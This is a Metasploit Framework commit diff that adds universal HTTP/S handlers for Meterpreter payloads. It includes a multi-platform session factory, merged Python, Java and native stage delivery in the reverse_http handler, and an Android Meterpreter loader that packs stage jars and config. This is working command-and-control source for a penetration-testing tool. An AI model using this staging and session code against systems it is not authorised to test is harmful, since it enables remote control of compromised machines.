Land rapid7#7634, Implement universal HTTP/S handlers for Meterpreter payloads

Author: Brent Cook

lib/msf/base/sessions/meterpreter_multi.rb

@@ -0,0 +1,50 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-independent meterpreter session type
+#
+###
+class Meterpreter_Multi < Msf::Sessions::Meterpreter
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'multi'
+    self.base_arch = ARCH_ANY
+  end
+
+  def self.create_session(rstream, opts={})
+    # TODO: fill in more cases here
+    case opts[:payload_uuid].platform
+    when 'python'
+      require 'msf/base/sessions/meterpreter_python'
+      return Msf::Sessions::Meterpreter_Python_Python.new(rstream, opts)
+    when 'java'
+      require 'msf/base/sessions/meterpreter_java'
+      return Msf::Sessions::Meterpreter_Java_Java.new(rstream, opts)
+    when 'android'
+      require 'msf/base/sessions/meterpreter_android'
+      return Msf::Sessions::Meterpreter_Java_Android.new(rstream, opts)
+    when 'php'
+      require 'msf/base/sessions/meterpreter_php'
+      return Msf::Sessions::Meterpreter_Php_Java.new(rstream, opts)
+    when 'windows'
+      if opts[:payload_uuid].arch == ARCH_X86
+        require 'msf/base/sessions/meterpreter_x86_win'
+        return Msf::Sessions::Meterpreter_x86_Win.new(rstream, opts)
+      end
+      require 'msf/base/sessions/meterpreter_x64_win'
+      return Msf::Sessions::Meterpreter_x64_Win.new(rstream, opts)
+    end
+
+    # TODO: what should we do when we get here?
+  end
+end
+
+end
+end
+

lib/msf/base/sessions/meterpreter_options.rb

@@ -67,9 +67,7 @@ def on_session(session)
       end
 
       if session.platform == 'android'
-        if datastore['AutoLoadAndroid']
-          session.load_android
-        end
+        session.load_android
       end
 
       [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|

lib/msf/core/exploit/browser_autopwn2.rb

@@ -323,7 +323,7 @@ def start_payload_listeners
         multi_handler.datastore['PAYLOAD']              = payload_name
         multi_handler.datastore['LPORT']                = wanted[:payload_lport]
 
-        %w(DebugOptions AutoLoadAndroid PrependMigrate PrependMigrateProc
+        %w(DebugOptions PrependMigrate PrependMigrateProc
            InitialAutoRunScript AutoRunScript CAMPAIGN_ID HandlerSSLCert
            StagerVerifySSLCert PayloadUUIDTracking PayloadUUIDName
            IgnoreUnknownPayloads SessionRetryTotal SessionRetryWait

lib/msf/core/handler.rb

@@ -199,7 +199,14 @@ def create_session(conn, opts={})
     # allocate a new session.
     if (self.session)
       begin
-        s = self.session.new(conn, opts)
+        # if there's a create_session method then use it, as this
+        # can form a factory for arb session types based on the
+        # payload.
+        if self.session.respond_to?('create_session')
+          s = self.session.create_session(conn, opts)
+        else
+          s = self.session.new(conn, opts)
+        end
       rescue ::Exception => e
         # We just wanna show and log the error, not trying to swallow it.
         print_error("#{e.class} #{e.message}")

lib/msf/core/handler/reverse_http.rb

@@ -317,77 +317,31 @@ def on_request(cli, req)
         pkt.add_tlv(Rex::Post::Meterpreter::TLV_TYPE_TRANS_URL, conn_id + "/")
         resp.body = pkt.to_r
 
-      when :init_python
-        print_status("Staging Python payload...")
+      when :init_python, :init_native, :init_java
+        # TODO: at some point we may normalise these three cases into just :init
         url = payload_uri(req) + conn_id + '/'
 
-        blob = ""
-        blob << self.generate_stage(
-          http_url: url,
-          http_user_agent: datastore['MeterpreterUserAgent'],
-          http_proxy_host: datastore['PayloadProxyHost'] || datastore['PROXYHOST'],
-          http_proxy_port: datastore['PayloadProxyPort'] || datastore['PROXYPORT'],
-          uuid: uuid,
-          uri:  conn_id
-        )
-
-        resp.body = blob
-
-        # Short-circuit the payload's handle_connection processing for create_session
-        create_session(cli, {
-          :passive_dispatcher => self.service,
-          :conn_id            => conn_id,
-          :url                => url,
-          :expiration         => datastore['SessionExpirationTimeout'].to_i,
-          :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
-          :retry_total        => datastore['SessionRetryTotal'].to_i,
-          :retry_wait         => datastore['SessionRetryWait'].to_i,
-          :ssl                => ssl?,
-          :payload_uuid       => uuid
-        })
-
-      when :init_java
-        print_status("Staging Java payload...")
-        url = payload_uri(req) + conn_id + "/\x00"
-
-        blob = self.generate_stage(
-          uuid: uuid,
-          uri:  conn_id
-        )
-
-        resp.body = blob
-
-        # Short-circuit the payload's handle_connection processing for create_session
-        create_session(cli, {
-          :passive_dispatcher => self.service,
-          :conn_id            => conn_id,
-          :url                => url,
-          :expiration         => datastore['SessionExpirationTimeout'].to_i,
-          :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
-          :retry_total        => datastore['SessionRetryTotal'].to_i,
-          :retry_wait         => datastore['SessionRetryWait'].to_i,
-          :ssl                => ssl?,
-          :payload_uuid       => uuid
-        })
-
-      when :init_native
-        print_status("Staging Native payload...")
-        url = payload_uri(req) + conn_id + "/\x00"
+        # Damn you, python! Ruining my perfect world!
+        url += "\x00" unless uuid.arch == ARCH_PYTHON
         uri = URI(payload_uri(req) + conn_id)
 
-        resp['Content-Type'] = 'application/octet-stream'
+        # TODO: does this have to happen just for windows, or can we set it for all?
+        resp['Content-Type'] = 'application/octet-stream' if uuid.platform == 'windows'
 
         begin
-          # generate the stage, but pass in the existing UUID and connection id so that
-          # we don't get new ones generated.
           blob = self.generate_stage(
-            uuid: uuid,
-            uri:  conn_id,
+            url:   url,
+            uuid:  uuid,
             lhost: uri.host,
-            lport: uri.port
+            lport: uri.port,
+            uri:   conn_id
           )
 
-          resp.body = encode_stage(blob)
+          blob = encode_stage(blob) if self.respond_to?(:encode_stage)
+
+          print_status("Staging #{uuid.arch} payload (#{blob.length} bytes) ...")
+
+          resp.body = blob
 
           # Short-circuit the payload's handle_connection processing for create_session
           create_session(cli, {
@@ -414,11 +368,14 @@ def on_request(cli, req)
         url = payload_uri(req) + conn_id
         url << '/' unless url[-1] == '/'
 
+        # Damn you, python! Ruining my perfect world!
+        url += "\x00" unless uuid.arch == ARCH_PYTHON
+
         # Short-circuit the payload's handle_connection processing for create_session
         create_session(cli, {
           :passive_dispatcher => self.service,
           :conn_id            => conn_id,
-          :url                => url + "\x00",
+          :url                => url,
           :expiration         => datastore['SessionExpirationTimeout'].to_i,
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :retry_total        => datastore['SessionRetryTotal'].to_i,

lib/msf/core/module/platform.rb

@@ -536,4 +536,12 @@ class Mainframe < Msf::Module::Platform
     Rank = 100
     Alias = "mainframe"
   end
+
+  #
+  # Multi (for wildcard-style platform functions)
+  #
+  class Multi < Msf::Module::Platform
+    Rank = 100
+    Alias = "multi"
+  end
 end

lib/msf/core/payload.rb

@@ -32,6 +32,9 @@ class Payload < Msf::Module
   require 'msf/core/payload/firefox'
   require 'msf/core/payload/mainframe'
 
+  # Universal payload includes
+  require 'msf/core/payload/multi'
+
   ##
   #
   # Payload types

lib/msf/core/payload/android.rb

@@ -24,41 +24,41 @@ def fix_dex_header(dexfile)
   # We could compile the .class files with dx here
   #
   def generate_stage(opts={})
+    ''
+  end
+
+  def generate_default_stage(opts={})
+    ''
   end
 
   #
   # Used by stagers to construct the payload jar file as a String
   #
-  def generate
-    generate_jar.pack
+  def generate(opts={})
+    generate_jar(opts).pack
   end
 
   def java_string(str)
     [str.length].pack("N") + str
   end
 
-  def apply_options(classes, opts)
-    config = generate_config_bytes(opts)
-    if opts[:stageless]
-      config[0] = "\x01"
-    end
-
-    string_sub(classes, "\xde\xad\xba\xad" + "\x00" * 8191, config)
-  end
-
-  def generate_config_bytes(opts={})
+  def generate_config(opts={})
     opts[:uuid] ||= generate_payload_uuid
+    ds = opts[:datastore] || datastore
 
     config_opts = {
       ascii_str:  true,
       arch:       opts[:uuid].arch,
-      expiration: datastore['SessionExpirationTimeout'].to_i,
+      expiration: ds['SessionExpirationTimeout'].to_i,
       uuid:       opts[:uuid],
-      transports: [transport_config(opts)]
+      transports: opts[:transport_config] || [transport_config(opts)]
     }
 
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
-    config.to_b
+    result = config.to_b
+
+    result[0] = "\x01" if opts[:stageless]
+    result
   end
 
   def string_sub(data, placeholder="", input="")
@@ -104,7 +104,8 @@ def generate_jar(opts={})
       classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
     end
 
-    apply_options(classes, opts)
+    config = generate_config(opts)
+    string_sub(classes, "\xde\xad\xba\xad" + "\x00" * 8191, config)
 
     jar = Rex::Zip::Jar.new
     files = [

lib/msf/core/payload/android/meterpreter_loader.rb

@@ -0,0 +1,56 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/core/payload/uuid/options'
+
+module Msf
+
+###
+#
+# Common loader for Android payloads that make use of Meterpreter.
+#
+###
+
+module Payload::Android::MeterpreterLoader
+
+  include Msf::Payload::Android
+  include Msf::Payload::UUID::Options
+  include Msf::Sessions::MeterpreterOptions
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Android Meterpreter & Configuration',
+      'Description'   => 'Android-specific meterpreter generation',
+      'Author'        => ['OJ Reeves'],
+      'Platform'      => 'android',
+      'Arch'          => ARCH_DALVIK,
+      'PayloadCompat' => {'Convention' => 'http https'},
+      'Stage'         => {'Payload' => ''}
+    ))
+  end
+
+  def stage_payload(opts={})
+    stage_meterpreter(opts)
+  end
+
+  def stage_meterpreter(opts={})
+    clazz = 'androidpayload.stage.Meterpreter'
+    metstage = MetasploitPayloads.read("android", "metstage.jar")
+    met = MetasploitPayloads.read("android", "meterpreter.jar")
+
+    # Name of the class to load from the stage, the actual jar to load
+    # it from, and then finally the meterpreter stage
+    blocks = [
+      java_string(clazz),
+      java_string(metstage),
+      java_string(met),
+      java_string(generate_config(opts))
+    ]
+
+    (blocks + [blocks.length]).pack('A*' * blocks.length + 'N')
+  end
+
+end
+end
+